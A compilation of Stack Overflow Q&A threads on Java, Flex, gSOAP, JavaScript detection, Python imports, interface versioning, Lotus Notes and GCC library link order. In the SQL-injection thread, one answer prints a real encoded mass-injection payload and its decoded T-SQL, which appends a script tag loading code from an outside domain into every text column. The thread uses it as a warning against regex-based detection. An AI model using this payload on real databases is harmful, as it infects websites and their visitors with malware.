A: I had the same problem. This error appeared when I tried to link fields of different types, or when I tried to drag-and-drop a table onto the .dbml surface when the .dbml already contained linked tables whose linked fields had different types.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45062",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Java: Flash a window to grab user's attention Is there a better way to flash a window in Java than this:
public static void flashWindow(JFrame frame) throws InterruptedException {
int sleepTime = 50;
frame.setVisible(false);
Thread.sleep(sleepTime);
frame.setVisible(true);
Thread.sleep(sleepTime);
frame.setVisible(false);
Thread.sleep(sleepTime);
frame.setVisible(true);
Thread.sleep(sleepTime);
frame.setVisible(false);
Thread.sleep(sleepTime);
frame.setVisible(true);
}
I know that this code is scary...But it works alright. (I should implement a loop...)
A: There are two common ways to do this: use JNI to set urgency hints on the taskbar's window, and create a notification icon/message. I prefer the second way, since it's cross-platform and less annoying.
See documentation on the TrayIcon class, particularly the displayMessage() method.
The following links may be of interest:
*
*New System Tray Functionality in Java SE 6
*Java Programming - Iconified window blinking
*TrayIcon for earlier versions of Java
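A minimal sketch of the tray-icon approach (Java 6+); the icon file and message text are placeholders:
import java.awt.*;

public class TrayNotifier {
    public static void notifyUser(String title, String text) throws AWTException {
        if (!SystemTray.isSupported()) return;
        Image image = Toolkit.getDefaultToolkit().getImage("icon.png"); // placeholder icon
        TrayIcon trayIcon = new TrayIcon(image, "MyApp");
        SystemTray.getSystemTray().add(trayIcon);
        // a balloon message is far less jarring than toggling window visibility
        trayIcon.displayMessage(title, text, TrayIcon.MessageType.INFO);
    }
}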
A: Well, there are a few minor improvements we could make. ;)
I would use a Timer to make sure callers don't have to wait for the method to return. And preventing more than one flashing operation at a time on a given window would be nice too.
import java.util.Map;
import java.util.Timer;
import java.util.TimerTask;
import java.util.concurrent.ConcurrentHashMap;
import javax.swing.JFrame;
public class WindowFlasher {
private final Timer timer = new Timer();
private final Map<JFrame, TimerTask> flashing
= new ConcurrentHashMap<JFrame, TimerTask>();
public void flashWindow(final JFrame window,
final long period,
final int blinks) {
TimerTask newTask = new TimerTask() {
private int remaining = blinks * 2;
@Override
public void run() {
if (remaining-- > 0)
window.setVisible(!window.isVisible());
else {
window.setVisible(true);
cancel();
}
}
@Override
public boolean cancel() {
// remove the window's entry only if this task is still the current one;
// a task that was already replaced must not evict its successor
flashing.remove(window, this);
return super.cancel();
}
};
TimerTask oldTask = flashing.put(window, newTask);
// if the window is already flashing, cancel the old task
if (oldTask != null)
oldTask.cancel();
timer.schedule(newTask, 0, period);
}
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45075",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Flex and .NET - What's a good way to get data into Flex, WebORB? Web Services? Ok, I asked a question earlier about Flex and ADO.NET Data Services but didn't get much response so I thought I'd rephrase. Does anyone have any experience building Adobe Flex applications with a .NET back-end? If so, what architecture did you use and what third-party tools if any did you employ. I've read a little about doing Flex remoting with WebORB but it seems more complicated than it should be, are web services an adequate alternative?
A: I believe web services are actually more complicated and more restrictive. You cannot create stateful web services, and data exchange is fairly slow due to the verbosity of XML. Developing with WebORB is not that hard. It basically boils down to developing an assembly and deploying it into the /bin folder of a weborb-enabled ASP.NET application. Once you do that you can invoke your .NET classes using Flex's RemoteObject API. For instance:
var ro:RemoteObject = new RemoteObject( "GenericDestination" );
ro.source = "com.bar.FooService"
ro.foo.addEventListener( ResultEvent.RESULT, gotFooResult );
ro.foo();
public function gotFooResult( evt:ResultEvent ):void
{
// evt.result contains the return value;
}
It is important to compile your Flex Builder project with the -services compiler argument. You can add it in Flex Builder's "Flex compiler" project properties:
-services c:/Inetpub/wwwroot/weborb30/web-inf/flex/services-config.xml
If you point to that path, then make sure to deploy your DLL into:
c:/Inetpub/wwwroot/weborb30/bin
A: I've mainly used plain ASP.NET pages that return XML for situations that are mainly one-way (data from ASP.NET --> Flex/Flash) communication. The Flex side just uses a URLLoader to hit the ASP.NET page and loads the result as XML.
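For illustration, that pattern might look like this in ActionScript 3 (the URL is a placeholder):
var loader:URLLoader = new URLLoader();
loader.addEventListener(Event.COMPLETE, function(e:Event):void {
    var result:XML = new XML(loader.data); // the ASP.NET page returned XML
    // use result here
});
loader.load(new URLRequest("http://server/app/GetData.aspx"));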
If the communication needs to be a little more two-sided (sending more than a couple of parameters to ASP.NET, let's say), I have used standard ASP.NET web services.
I've never used WebOrb or Flex remoting because I've never really needed that type of interaction between the server and the SWF.
Hope that helps.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45078",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Connect C++ app to JAVA web app with SOAP I have a C++ app that needs to connect to a JAVA web app, are there any good, open source SOAP packages for this, or would it be easier to just roll my own?
A: I'll vote up darkhelmet since gSoap would also be my recommendation. We're mostly a Java shop but with some C++ bits and gSoap has been our preferred SOAP integration way. It is indeed more work than your typical Java stacks but it seems solid.
A: A quick Google turned up this for a toolkit. While I have never used it, it seems to be quite popular and solid. Not exactly a package, and not really rolling your own, but sort of in the middle.
A: We went with gSOAP rather than Axis to avoid having a dependency on both a JRE and Axis just for building a C++ project. It's worked ok, which is good since the gSOAP code is horrible and makes it very daunting to fix any bugs in it.
A warning about gSOAP linking though: you can never use more than one WSDL in a single link object (executable, dll, shared object). This is because some of the generated WSDL-specific functions have general names (e.g. soap_getfault()).
Worse, with Unix ELF linking, these names will cause cross-linking between shared objects, so a FooService fault might be processed by the soap_getfault() for BarService, corrupting memory if the fault detail structures are different.
The workaround for that is to make sure that nothing gSOAP-related is exposed outside the SO it is linked into. This can be solved by giving gcc these definitions both when building the gSOAP library itself and when building your code:
#define SOAP_FMAC2 __attribute__ ((visibility ("hidden")))
#define SOAP_FMAC4 __attribute__ ((visibility ("hidden")))
#define SOAP_FMAC6 __attribute__ ((visibility ("hidden")))
#define SOAP_NMAC __attribute__ ((visibility ("hidden")))
I solved it by putting them into a header file and forcing gcc to include that before anything else with -include fixsoaplink.h.
A better way, if you can take the effort, might be to change the default ELF visibility to hidden, and only export the symbols you want to (like dllimport/dllexport in VC).
A: Take a look at Apache's Axis project. It's well supported on C++ (and Java) and if you have the good fortune to start with a good WSDL for the target service you'll be home-free.
A: When I saw the generated code from gSOAP, I about had a heart attack.
The fact that the user is required to do all of the memory management for each object just boggled my mind. So, I sat down and did something probably stupid in the long term, but fairly satisfying in the short term...
I wrote a program that wraps the gSOAP code with my own CPP classes that make the interface look more like I'd like it to look.
I used Scoped Guards within each service method to hold onto memory, and since I'm dealing with all sorts of different types, I used a std::list<boost::any> to do it. I have functions that make each object type that I need, and they put the actual memory into my list<any>. It's had a few problems - mostly just configuration changes. I'm generating thousands of classes now, talking to dozens of web services.
I'm not sure I'd recommend my same path to anyone else... I should probably bite the bullet and start trying to contribute to gSOAP, rather than maintain my own tool which is dependent on the output of gSOAP...
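For what it's worth, the scoped-guard idea described above can be sketched like this (a simplification under my assumptions, not the actual tool):
#include <list>
#include <boost/any.hpp>
#include <boost/shared_ptr.hpp>

// Holds heap objects for the duration of one service call; everything
// registered here is freed when the guard goes out of scope.
class SoapCallScope {
public:
    template <typename T>
    T* track(T* p) {
        owned_.push_back(boost::any(boost::shared_ptr<T>(p)));
        return p;
    }
private:
    std::list<boost::any> owned_; // boost::any erases the element types
};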
A: Here's another issue with gSOAP we just discovered the hard way: it uses select() for all polling, so once you've got 1024 file descriptors open (64 on Windows?) it will trash the stack. That results in either spurious errors where it is unable to send messages, to complete crashes of the application.
The workaround, unless you're prepared to patch gSOAP itself, is to write your own network code and hook it in with soap->fconnect, ->fsend, ->frecv etc.
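A rough sketch of those hooks (fsend/frecv are gSOAP's documented callback slots; the poll()-based bodies are left as assumptions):
static int my_send(struct soap *soap, const char *buf, size_t len)
{
    /* write buf with poll()-based I/O instead of select() */
    return SOAP_OK;
}

static size_t my_recv(struct soap *soap, char *buf, size_t len)
{
    /* read up to len bytes with poll()-based I/O; return the byte count */
    return 0;
}

/* after soap_init(&soap): */
soap.fsend = my_send;
soap.frecv = my_recv;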
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45086",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: RegEx to Detect SQL Injection Is there a Regular Expression that can detect SQL in a string? Does anyone have a sample of something that they have used before to share?
A: Don't do it. You're practically guaranteed to fail. Use PreparedStatement (or its equivalent) instead.
A: Save yourself problems and use stored procedures with prepared statements or parameterized queries. Stored procedures are good practice anyway, as they act like an interface to the database, so you can change what happens behind the scenes (inside the stored proc) but the signature remains the same. The prepared statements help take care of injection protection.
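For example, a parameterized query in C#/ADO.NET might look like this (table and column names are illustrative, and conn is assumed to be an open SqlConnection):
using (var cmd = new SqlCommand("SELECT * FROM Users WHERE Name = @name", conn))
{
    // the value travels as data and is never spliced into the SQL text
    cmd.Parameters.AddWithValue("@name", userInput);
    using (var reader = cmd.ExecuteReader())
    {
        // ...
    }
}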
A: Use stored procedures or prepared statements. How will you detect something like this?
BTW do NOT run this:
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415 245204054205641524348415228323535292C40432056415243
4841522832353529204445434C415245205461626C655 F437572736F7220435552534F5220464F522053454C45435420612E6 E616D652C622E6E616D652046524F4D207379736F626A65637473206 12C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747 970653D3939204F5220622E78747970653D3335204F5220622E78747 970653D323331204F5220622E78747970653D31363729204F50454E2 05461626C655F437572736F72204645544348204E4558542046524F4 D205461626C655F437572736F7220494E544F2040542C40432057484 94C4528404046455443485F5354415455533D302920424547494E204 55845432827555044415445205B272B40542B275D20534554205B272 B40432B275D3D525452494D28434F4E5645525428564152434841522 834303030292C5B272B40432B275D29292B27273C736372697074207 372633D687474703A2F2F7777772E63686B626E722E636F6D2F622E6 A733E3C2F7363726970743E27272729204645544348204E455854204 6524F4D205461626C655F437572736F7220494E544F2040542C40432 0454E4420434C4F5345205461626C655F437572736F72204445414C4 C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);
Which translates to:
( DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC(
'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=chkbnr.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor )
A: I don't have a regex but my understanding is that the most important thing is to detect the single quote. All the injection attacks start from there. They probably have the -- in there too to comment out and other SQL that might be after the string.
A: As said, it is better to use prepared statements. You could argue forcing key queries to be executed by a stored procedure to force the use of preparing the call.
Anyway, here is a simple grep to detect the classic n=n integer comparison in WHERE clauses; it skips flagging the 1=1 used by many lazy query constructors for AND, but will flag it for OR
((WHERE|OR)[ ]+[\(]*[ ]*([\(]*[0-9]+[\)]*)[ ]*=[ ]*[\)]*[ ]*\3)|AND[ ]+[\(]*[ ]*([\(]*1[0-9]+|[2-9][0-9]*[\)]*)[ ]*[\(]*[ ]*=[ ]*[\)]*[ ]*\4
It could of course be improved to detect decimal and string comparisons, but it was a quick detection mechanism, along with other greps such as ORD(MID(, etc.
Use it on a query log, such as mysql's general log
Hope it's useful
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45093",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: How do I know if Javascript has been turned off inside browser? I assume that you can't use a JavaScript code snippet to validate if the browser user has turned off JavaScript. So what can I use instead? Can someone offer a code sample?
I'm looking to wrap an if/then statement around it.
I often code in CFML, if that helps.
A: this is a total hack but you could use an iframe inside the noscript tag to trigger an HTTP GET on a url to tell the server that a user doesn't have javascript enabled.
<body>
...
...
<noscript>
<iframe src ="/nojs.aspx?SOMEIDENTIFIER=XXXX&NOJS=TRUE" style="display: none;">
</iframe>
</noscript>
...
...
</body>
A: Use the <noscript> HTML tags.
A: Not sure what you are trying to do, but if you just need to inform the user that Javascript is required, you can just use the '<noscript>' tag. If you need to know on the server, you could make an Ajax-style request to the server from javascript. If you get the request, javascript is working; otherwise it's not.
A: Are we talking about something like this:
JavaScript:
<body>
...
...
<script type="text/javascript">
<!--
document.write("Hello World!")
//-->
</script>
<noscript>Your browser does not support JavaScript!</noscript>
...
...
</body>
A: He's asking for a check to see if javascript is enabled.
I can only think of doing exactly what the OP said - try using some Javascript with an interval to send a callback if JS is activated - unfortunately I don't think you can check server side whether JS is enabled, which is why you use <noscript> tags rather than render different content from the server.
A: If you use Unobtrusive JavaScript then you don't need to check whether the user has JavaScript enabled.
If they have got JavaScript enabled then they'll get the full effect, but if they haven't then users will still be able to use your site. And as well as being better for accessibility you might find this approach boosts your SEO.
A: <noscript>
...some non-js code
</noscript>
A: Yes that NoScript snippet is right.
A: You might have javascript execute some AJAX query and check to see if it has. Those that download the page and don't execute the query either have JS disabled or they're robots.
A: Really all you can do is put some message in the <noscript> tags. I seem to remember trying this on ASP.NET somewhere, but you can really only tell if the browser supports Javascript, not whether or not it is actually allowed/enabled.
A: I don't know much about CFML, but .NET has the ability to detect browser capabilities. It does not, however, have the ability to detect if the browser is capable of javascript, but has it turned off. So, you're stuck there too.
Besides the HTML noscript tag, there's not much you can do, as far as I know, besides writing javascript progressively (see progressive enhancement) so that you don't need to check for Javascript:off.
A: I don't know JS, but would it be possible to modify the links inside the page with JS? If someone goes to the unmodified link, they're not using JS, but if they do then they are using JS. Does this make any sense?
A: Have never worked out how to do it without a round trip, so it depends on what your goal is.
If they have to have javascript to proceed, then I have (in .NET) done things like disabling the login button on the server side, then enabling it client side with javascript, and used a noscript tag to show an error message.
If it has to work either way, you can use progressive enhancement, and / or use js to set a hidden field and then set a session variable, but this means that you don't know until they get to the second request.
A: you could write
<script type="text/javascript" language="javascript">document.write("<input type='hidden' name='hasJs' value='1' />");</script>
or otherwise write a cookie via JS and then read it at the server, if you want to check server side for JS.
A: if you are looking for a way to check it server side, you can send the user some JS that sets a cookie... if the cookie exists on a request, then you can tell whether the script worked!
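A tiny sketch of that (the cookie name is arbitrary); the server then just checks for the hasJs cookie on the next request:
<script type="text/javascript">
document.cookie = "hasJs=1; path=/";
</script>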
A: One reliable way to do this is using javascript's $.post to send a note to your server. (Apologies if there are any errors in this, written off the top of my head, will update later when I get around to testing.) This should allow you to build it so you can even pull from session data if they're using javascript, which will allow you to serve up replacements for javascript without having to resort to <noscript>.
Your on-page script:
<script>
function myJavascriptTest(){
    $.post('myJavascriptTest.php', { myJavascriptOn: true }, function(){
        return true;
    });
}
myJavascriptTest();
</script>
And in the targeted .php...
<?php
if ($_POST['myJavascriptOn'] == true){
$_SESSION['javascriptIsOn'] = true;
} else {
$_SESSION['javascriptIsOn'] = false;
}
?>
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45097",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: Python packages - import by class, not file Say I have the following file structure:
app/
app.py
controllers/
__init__.py
project.py
plugin.py
If app/controllers/project.py defines a class Project, app.py would import it like this:
from app.controllers.project import Project
I'd like to just be able to do:
from app.controllers import Project
How would this be done?
A: You need to put
from project import Project
in controllers/__init__.py.
Note that when absolute imports become the default (Python 3), you will want to add a dot before the module name (to avoid collisions with a top-level module named project), i.e.,
from .project import Project
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45122",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "58"
} |
Q: Interfaces and Versioning I am designing a new System and I have a lot of Interfaces that will grow over time with the system. What is the best practice to name these interfaces?
ISomethingV01
ISomethingV02
etc
and I do this
public interface ISomething{
void method();
}
then I have to add method2, so now what do I do?
public interface ISomethingV2:ISomething{
void method2();
}
or same other way?
A: I think you're overusing interfaces.
Meyer and Martin told us: "Open for extension but closed for modification!"
and then Cwalina (et al) reiterated:
From Framework Design Guidelines...
In general, classes are the preferred construct for exposing abstractions. The main drawback of interfaces is that they are much less flexible than classes when it comes to allowing for evolution of APIs. Once you ship an interface, the set of its members is fixed forever. Any additions to the interface would break existing types implementing the interface.
A class offers much more flexibility. You can add members to classes that have already shipped. As long as the method is not abstract (i.e., as long as you provide a default implementation of the method), any existing derived classes continue to function unchanged.
A: Ideally, you shouldn't be changing your interfaces very often (if at all). If you do need to change an interface, you should reconsider its purpose and see if the original name still applies to it.
If you still feel that the interfaces will change, and the interface changes are small (adding items), and you have control of the whole code base, then you should just modify the interface and fix all the compilation errors.
If your change is a change in how the interface is to be used, then you need to create a separate interface (most likely with a different name) to support that alternative usage pattern.
Even if you end up creating ISomething, ISomething2 and ISomething3, the consumers of your interfaces will have a hard time figuring out what the differences are between the interfaces. When should they use ISomething2 and when should they use ISomething3? Then you have to go about the process of obsoleting ISomething and ISomething2.
A: I agree with Garo Yeriazarian, changing an interface is a serious decision. Also, if you want to promote usage of a new version of an interface, you should mark the old version as obsolete. In .NET you can add the ObsoleteAttribute.
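For example (a minimal sketch):
[Obsolete("Use ISomethingV2 instead.")]
public interface ISomething
{
    void method();
}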
A: The purpose of an interface is to define an abstract pattern that at type must implement.
It would be better implement as:
public interface ISomething
public class Something1 : ISomething
public class Something2 : ISomething
You do not gain anything in the form of code reusability or scalable design by creating multiple versions of the same interface.
A: I don't know why people downvote your post. I think that good naming guidelines are very important.
If you need to maintain compatibility with prev. version of the same interface consider using inheritance.
If you need to introduce a new version of an interface, consider the following rule:
Try to add a meaningful suffix to your interface. If it's not possible to create a concise name, consider adding a version number.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45123",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "12"
} |
Q: What is the best way and recommended practices for interacting with Lotus Notes from C# In particular, I have to extract all the messages and attachments from Lotus Notes files in the fastest and most reliable way. Another point that may be relevant is that I need to do this from a secondary thread.
Edit
Thanks for the answers - both of which are good. I should provide more background information.
We currently have a WinForms application with a background thread using the Notes COM API.
However it seems to be unstable. (Of course it may be we are doing something wrong.) For example, we have found we have to preinitialize the Notes session on the main thread or else the call to session.CreateDXLExporter() on the background thread throws an exception.
A: I really do hate that NotesSession COM object.
You cannot use it on any thread other than the one it was initialized on.
.NET makes no guarantee that a managed thread stays on the same underlying OS thread (a CLR host may even schedule managed code on fibers), so the COM object's thread affinity can be silently broken.
So I suggest using it this way, in a using block :
Imports Domino
Imports System.Threading
Public Class AffinitedSession
Implements IDisposable
Private _session As NotesSession
Public Sub New(ByVal pass As String)
Thread.BeginThreadAffinity()
_session = New NotesSession()
_session.Initialize(pass)
End Sub
Public ReadOnly Property NotesSession() As NotesSession
Get
Return _session
End Get
End Property
Private disposedValue As Boolean = False ' To detect redundant calls
' IDisposable
Protected Overridable Sub Dispose(ByVal disposing As Boolean)
If Not Me.disposedValue Then
If disposing Then
' TODO: free other state (managed objects).
End If
' TODO: free your own state (unmanaged objects).
' TODO: set large fields to null.
_session = Nothing
Thread.EndThreadAffinity()
End If
Me.disposedValue = True
End Sub
#Region " IDisposable Support "
' This code added by Visual Basic to correctly implement the disposable pattern.
Public Sub Dispose() Implements IDisposable.Dispose
' Do not change this code. Put cleanup code in Dispose(ByVal disposing As Boolean) above.
Dispose(True)
GC.SuppressFinalize(Me)
End Sub
#End Region
End Class
Notice the Thread.BeginThreadAffinity() and the Thread.EndThreadAffinity()
Those are your friends.
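Usage then looks something like this (a sketch; the password and database path are placeholders):
Using s As New AffinitedSession("password")
    Dim db As NotesDatabase = s.NotesSession.GetDatabase("", "names.nsf")
    ' work with db while the thread affinity is pinned
End Using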
Cheers !
A: An Lotus Notes COM Api Reference can be found here
To get a Notes Session (The starting point) in VB.Net you can use:
Dim oSess As Object = Nothing
oSess = CreateObject("Notes.NotesSession")
I normally program in C#, for operating with COM I prefer VB.Net
It is better to access all COM servers from the same thread, unless you are certain that it will not cause any trouble.
A: Take a look at NotesSQL:
http://www.ibm.com/developerworks/lotus/products/notesdomino/notessql/
A: If you have a Domino / Lotus Notes client installed on the same machine, you can use COM. Just do a Google search on 'Accessing the Domino Objects through COM' and you'll find the Domino Designer help entry for just about any version of Domino.
You can also access Domino via the C API, but wouldn't recommend it. Very messy. You also still need the Domino / Lotus Notes client installed.
If you do not have Domino / Lotus Notes client installed on the same machine and the Domino server is running http, you could also do it via http. This will not be nearly as fast. You would also probably want some custom http views setup on the Domino server to make your life easier.
A: You could create a Domino web service using Java or LotusScript. Then use C# to access the web service.
I've only done this once, to read data out of an Lotus Notes db into a .NET app running on another machine.
Writing and testing simple Web services
http://www.ibm.com/developerworks/lotus/library/web-services2/
When I find some time I will write a complete example :-)
A: I worked on a Notes plugin for several months a little while back, and yes, the API can be maddening. However, I was able to get it to work so I could access all the Notes information using a C# application (actually, since I was writing a plugin, I had Notes call out to the C# app through a C++ bridge that it registered in a startup .ini file). Certain methods that they document in their API don't actually work though, so a lot of testing is required. Sometimes you have to do some code gymnastics...
A: Back in the day I would have recommended N2N from Proposion, but that product has gone since Quest acquired Proposion.
That said, Proposion was proof that you can wrap the Notes API in a set of .Net classes safely. You can find some info on that in Bob Balaban's blog.
A: I know this thread is old, but I've worked a lot with the Domino API and the typical Notes LotusScript objects via the Domino COM API.
The problem with the Domino API is that its memory management via COM is horrible (if using the API in C#, or VB, etc.), and it will cause memory leaks and eventually cause the whole API and the Notes client to crash (even if you don't have the client open, you will not be able to start it after the API crashes without restarting your computer, or calling "nsd -kill"). Fun.
I've found that using the Notes C API within C# via P/Invoke, you can better manage the memory resources so that the API doesn't cause horrible memory leaks and crashes. I wrote a partial wrapper in C#, using P/Invoke, that accesses the Notes C API from the notes.dll. My use of it has nothing to do with trying to work within a Domino environment, but to make use of the Notes assembly to have access to NSF files to extract DXL information within a C# environment. Obviously, you would need to have the Notes client installed to have access to the notes.dll and the C API. But my C# wrapper of the Notes C API works great and is more stable than the Domino COM API that is provided when you install the Notes client.
The classes that I've implemented in C# (that I've only needed) from the Notes C API are:
NotesSession (as NotesRuntime)
NotesDatabase
NotesNote
NotesItem
NotesDXLExporter
NotesNoteCollection
As well as some other interim classes, enums, and structs to handle the translation from the C API into C#.
The classes I've implemented thus far have served the purposes that I've needed from the Notes C API. They can definitely be expanded upon, but I didn't try to encapsulate the entire API within the C# P/Invoke wrapper. I also had to create handlers for dealing with OLE embedded objects that may be stored within Notes documents, and getting the stored data out of those OLE objects, using Windows IStorage objects.
Note: I can provide some samples later (I have to rename namespaces and generalize the code, due to proprietary reasons), but I created the C# wrapper classes by using the "Lotus C API Notes/Domino 8.5.2 Reference" NSF that is provided by IBM/Lotus (as a downloadable NSF). Using the C definitions and class references, I could translate those to C# P/Invoke calls and wrap them into friendlier C# classes, that then behaved more like LotusScript class calls, but within C#, and the implemented classes manage and dispose of their memory so that the whole thing doesn't crash after you've accessed hundreds of thousands of documents from a C# program. :)
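To give a flavor of it, here is a heavily simplified P/Invoke sketch. NotesInit, NotesTerm, NSFDbOpen and NSFDbClose are documented Notes C API entry points, but the marshaling shown is an assumption and error handling is omitted:
using System;
using System.Runtime.InteropServices;

static class NotesCApi
{
    [DllImport("notes.dll", CharSet = CharSet.Ansi)]
    public static extern ushort NotesInit();

    [DllImport("notes.dll", CharSet = CharSet.Ansi)]
    public static extern ushort NotesTerm();

    [DllImport("notes.dll", CharSet = CharSet.Ansi)]
    public static extern ushort NSFDbOpen(string pathName, out IntPtr hDb);

    [DllImport("notes.dll", CharSet = CharSet.Ansi)]
    public static extern ushort NSFDbClose(IntPtr hDb);
}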
A: I would personally do this natively in Notes, in either LotusScript or Java. You can do a scheduled agent in Notes much more easily than a service in C#.
A: I personally quite like the Domino-wrapped .NET assembly for the COM API. When you develop your C# code you can almost imagine your dreams of a proper Notes IDE came true. But it has some drawbacks: on version 6.5 (I haven't tried newer) your application crashes in many cases when the LotusScript code returns a type mismatch for a parameter. But this is due to COM limitations, of course.
At the same time the wrapper doesn't allow working with NotesUI classes. However I used reflections from very old Notes COM API examples to call NotesUI classes and it worked. It was handy when I developed an Outlook plug-in that required interaction with Notes client UI. I managed to create a simple wrapper for UI classes too.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45132",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: Why does the order in which libraries are linked sometimes cause errors in GCC? Why does the order in which libraries are linked sometimes cause errors in GCC?
A: A quick tip that tripped me up: if you're invoking the linker as "gcc" or "g++", then using "--start-group" and "--end-group" won't pass those options through to the linker -- nor will it flag an error. It will just fail the link with undefined symbols if you had the library order wrong.
You need to write them as "-Wl,--start-group" etc. to tell GCC to pass the argument through to the linker.
A: (See the history on this answer to get the more elaborate text, but I now think it's easier for the reader to see real command lines).
Common files shared by all below commands
// a depends on b, b depends on d
$ cat a.cpp
extern int a;
int main() {
return a;
}
$ cat b.cpp
extern int b;
int a = b;
$ cat d.cpp
int b;
Linking to static libraries
$ g++ -c b.cpp -o b.o
$ ar cr libb.a b.o
$ g++ -c d.cpp -o d.o
$ ar cr libd.a d.o
$ g++ -L. -ld -lb a.cpp # wrong order
$ g++ -L. -lb -ld a.cpp # wrong order
$ g++ a.cpp -L. -ld -lb # wrong order
$ g++ a.cpp -L. -lb -ld # right order
The linker searches from left to right, and notes unresolved symbols as it goes. If a library resolves the symbol, it takes the object files of that library to resolve the symbol (b.o out of libb.a in this case).
Dependencies of static libraries against each other work the same - the library that needs symbols must be first, then the library that resolves the symbol.
If a static library depends on another library, but the other library again depends on the former library, there is a cycle. You can resolve this by enclosing the cyclically dependent libraries by -( and -), such as -( -la -lb -) (you may need to escape the parens, such as -\( and -\)). The linker then searches those enclosed lib multiple times to ensure cycling dependencies are resolved. Alternatively, you can specify the libraries multiple times, so each is before one another: -la -lb -la.
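For example, a grouped link through the compiler driver looks like this (assuming liba and libb depend on each other):
$ g++ main.o -L. -Wl,--start-group -la -lb -Wl,--end-group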
Linking to dynamic libraries
$ export LD_LIBRARY_PATH=. # not needed if libs go to /usr/lib etc
$ g++ -fpic -shared d.cpp -o libd.so
$ g++ -fpic -shared b.cpp -L. -ld -o libb.so # specifies its dependency!
$ g++ -L. -lb a.cpp # wrong order (works on some distributions)
$ g++ -Wl,--as-needed -L. -lb a.cpp # wrong order
$ g++ -Wl,--as-needed a.cpp -L. -lb # right order
It's the same here - the libraries must follow the object files of the program. The difference here compared with static libraries is that you need not care about the dependencies of the libraries against each other, because dynamic libraries sort out their dependencies themselves.
Some recent distributions apparently default to using the --as-needed linker flag, which enforces that the program's object files come before the dynamic libraries. If that flag is passed, the linker will not link to libraries that are not actually needed by the executable (and it detects this from left to right). My recent archlinux distribution doesn't use this flag by default, so it didn't give an error for not following the correct order.
It is not correct to omit the dependency of b.so on d.so when creating the former. You would then be required to specify the library when linking a, but a doesn't really need the integer b itself, so it should not be made to care about b's own dependencies.
Here is an example of the implications if you miss specifying the dependencies for libb.so
$ export LD_LIBRARY_PATH=. # not needed if libs go to /usr/lib etc
$ g++ -fpic -shared d.cpp -o libd.so
$ g++ -fpic -shared b.cpp -o libb.so # wrong (but links)
$ g++ -L. -lb a.cpp # wrong, as above
$ g++ -Wl,--as-needed -L. -lb a.cpp # wrong, as above
$ g++ a.cpp -L. -lb # wrong, missing libd.so
$ g++ a.cpp -L. -ld -lb # wrong order (works on some distributions)
$ g++ -Wl,--as-needed a.cpp -L. -ld -lb # wrong order (like static libs)
$ g++ -Wl,--as-needed a.cpp -L. -lb -ld # "right"
If you now look into what dependencies the binary has, you note the binary itself depends also on libd, not just libb as it should. The binary will need to be relinked if libb later depends on another library, if you do it this way. And if someone else loads libb using dlopen at runtime (think of loading plugins dynamically), the call will fail as well. So the "right" really should be a wrong as well.
A: Here's an example to make it clear how things work with GCC when static libraries are involved. So let's assume we have the following scenario:
*
*myprog.o - containing main() function, dependent on libmysqlclient
*libmysqlclient - static, for the sake of the example (you'd prefer the shared library, of course, as the libmysqlclient is huge); in /usr/local/lib; and dependent on stuff from libz
*libz (dynamic)
How do we link this? (Note: examples from compiling on Cygwin using gcc 4.3.4)
gcc -L/usr/local/lib -lmysqlclient myprog.o
# undefined reference to `_mysql_init'
# myprog depends on libmysqlclient
# so myprog has to come earlier on the command line
gcc myprog.o -L/usr/local/lib -lmysqlclient
# undefined reference to `_uncompress'
# we have to link with libz, too
gcc myprog.o -lz -L/usr/local/lib -lmysqlclient
# undefined reference to `_uncompress'
# libz is needed by libmysqlclient
# so it has to appear *after* it on the command line
gcc myprog.o -L/usr/local/lib -lmysqlclient -lz
# this works
A: You can use the -Xlinker option.
g++ -o foobar -Xlinker -start-group -Xlinker libA.a -Xlinker libB.a -Xlinker libC.a -Xlinker -end-group
is ALMOST equal to
g++ -o foobar -Xlinker -start-group -Xlinker libC.a -Xlinker libB.a -Xlinker libA.a -Xlinker -end-group
Careful !
*
*The order within a group is important ! Here's an example: a debug library has a debug routine, but the non-debug library has a weak version of the same. You must put the debug library FIRST in the group or you will resolve to the non-debug version.
*You need to precede each library in the group list with -Xlinker
A: If you add -Wl,--start-group to the linker flags it does not care which order they're in or if there are circular dependencies.
On Qt this means adding:
QMAKE_LFLAGS += -Wl,--start-group
Saves loads of time messing about and it doesn't seem to slow down linking much (which takes far less time than compilation anyway).
A: I have seen this a lot; some of our modules link in excess of 100 libraries of our code, plus system & 3rd-party libs.
Depending on different linkers HP/Intel/GCC/SUN/SGI/IBM/etc you can get unresolved functions/variables etc, on some platforms you have to list libraries twice.
